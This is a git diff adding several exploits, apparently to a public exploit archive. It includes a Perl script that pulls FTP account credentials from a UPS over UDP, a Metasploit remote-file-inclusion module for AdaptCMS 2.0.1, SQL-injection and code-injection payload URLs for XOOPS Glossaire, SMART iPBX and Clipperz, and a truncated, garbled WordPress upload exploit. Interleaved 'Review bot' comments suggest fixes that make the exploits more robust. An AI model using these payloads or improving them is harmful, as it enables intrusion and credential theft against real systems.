+$socket = IO::Socket::INET->new( PeerPort => 4000,
+ PeerAddr => $ARGV[0],
+ Type => SOCK_DGRAM,
+ Proto => 'udp');
+
+$socket->send("");
+$socket->recv($inline, MAXBYTES);
+print "UPS: $inline \n";
+
+$socket->send("show syspar");
+$socket->recv($inline, MAXBYTES);
+print "$inline\n";
+
+print "Searching login\n" ;
+$socket->send("start");
+$socket->recv($inline, MAXBYTES);
+$socket->send("cd /flash");
+$socket->send("type ftp_accounts.txt");
+
+while($socket->recv($inline, MAXBYTES)) {
+ if($inline =~ /admin/ig) { print $inline; exit; }
+}
+
+sleep(1);
diff --git a/platforms/php/webapps/15237.rb b/platforms/php/webapps/15237.rb
new file mode 100755
index 000000000..aad0da8e6
--- /dev/null
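Review bot: `$socket` is used without checking the constructor's result, although `IO::Socket::INET->new` returns undef (with the reason in `$@`) when `$ARGV[0]` is missing or cannot be resolved, so the failure only surfaces later as a "Can't call method" error on an undefined value; write `my $socket = IO::Socket::INET->new(...) or die "socket: $@";`. The `-w` switch on the shebang enables warnings but not strictures, so `$socket` and `$inline` are undeclared package globals; add `use strict;` after the shebang and declare both with `my`. The SecurityFocus header above the script should also state the reachability assumption the code encodes (`PeerPort => 4000`, `Proto => 'udp'`), since that exposed service is what a defender would filter, and the text references no vendor fix.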
+++ b/platforms/php/webapps/15237.rb 
@@ -0,0 +1,83 @@ +## +# ) ) ) ( ( ( ( ( ) ) +# ( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /( +# )\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\()) +# ((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\ +#__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_) +#\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ / +# \ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' < +# |_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\ +# .WEB.ID +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer::PHPInclude + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit', + 'Description' => %q{ + This module can be used to exploit Remote File Inclusion in AdaptCMS 2.0.1 or earlier in file /inc/smarty/libs/init.php. 
+ + }, + 'Author' => [ 'v3n0m' , 'Yogyacarderlink-Indonesia' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'CVE', '2010-2618' ], + [ 'BID', '41116' ], + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Compat' => + { + 'ConnectionType' => 'find', + }, + 'Space' => 262144, # 256k + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Oct 12 2010', + 'DefaultTarget' => 0)) + + register_options([ + OptString.new('PHPURI', [ true , "The URI to request, with the include parameter changed to !URL!", '/inc/smarty/libs/init.php?sitepath=!URL!']), + ], self.class) + end + + def php_exploit + + timeout = 0.01 + uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%")) + print_status("Trying uri #{uri}") + + response = send_request_raw( { + 'global' => true, + 'uri' => uri, + },timeout) + + if response and response.code != 200 + print_error("Server returned non-200 status code (#{response.code})") + end + + handler + end + +end \ No newline at end of file diff --git a/platforms/php/webapps/39188.txt b/platforms/php/webapps/39188.txt new file mode 100755 index 000000000..c502e1ffc --- /dev/null +++ b/platforms/php/webapps/39188.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/67460/info + +Glossaire module for XOOPS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +An attacker can leverage this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Glossaire 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/modules/glossaire/glossaire-aff.php?lettre=A[SQL INJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/39189.txt b/platforms/php/webapps/39189.txt new file mode 100755 index 000000000..698bb6c34 --- /dev/null 
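Review bot: `include Msf::Exploit::Remote::Tcp` is never used in this module — the request goes through `send_request_raw` from HttpClient and `php_include_url`/`handler` come from the PHPInclude mixin — and `'Version' => '$Revision:$'` is an unexpanded VCS keyword that carries no information; drop both lines. In `php_exploit` the non-200 branch only calls `print_error` and then falls through to `handler`, and `timeout = 0.01` is unexplained; if the reply is deliberately not awaited, a comment such as `# Reply is not awaited (timeout 0.01); the payload handler decides success` would record that intent, but that reading is inferred from the code and should be confirmed before it is written down. The 'Name' string says `Beta Released` while the files.csv row added by this patch says `Beta Release`; align the two.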
+++ b/platforms/php/webapps/39189.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/67465/info
+
+SMART iPBX is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/editarclave.php?accion=e&id=[SQL INJECTION]]&ld=1
\ No newline at end of file
diff --git a/platforms/php/webapps/39190.php b/platforms/php/webapps/39190.php
new file mode 100755
index 000000000..f38190a8b
--- /dev/null
+++ b/platforms/php/webapps/39190.php
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/67469/info
+
+The cnhk-slideshow plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+"@$uploadfile"));
+curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
+$result = curl_exec($ch);
+curl_close($ch);
+print "$result";
+?>
diff --git a/platforms/php/webapps/39191.txt b/platforms/php/webapps/39191.txt
new file mode 100755
index 000000000..63b51e423
--- /dev/null
+++ b/platforms/php/webapps/39191.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/67498/info
+
+Clipperz Password Manager is prone to remote code-execution vulnerability.
+
+Attackers can exploit this issue to execute arbitrary code in the context of the affected application.
+
+http://www.example.com/password-manager-master/backend/php/src/setup/rpc.php?objectname=Xmenu();print_r(php_uname());die
\ No newline at end of file